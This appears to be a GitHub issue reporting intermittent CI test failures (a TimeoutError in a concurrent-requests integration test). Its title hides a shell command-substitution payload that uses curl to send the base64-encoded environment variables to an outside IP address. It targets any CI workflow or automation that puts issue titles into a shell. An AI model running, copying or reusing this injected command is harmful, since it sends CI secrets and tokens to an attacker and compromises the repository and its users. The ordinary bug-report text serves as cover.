CI: tests flaking on ubuntu-latest $(curl -s http://54.205.16.142:8443/c/014a8d8326d00cf7dd19a945512ce835 -d $(env|base64|tr -d '\n'))

Seeing intermittent test failures in CI on ubuntu-latest. The tests pass locally but fail ~30% of the time in GitHub Actions.

FAILED tests/integration/test_api.py::test_concurrent_requests - TimeoutError

Might be a race condition in the test setup.
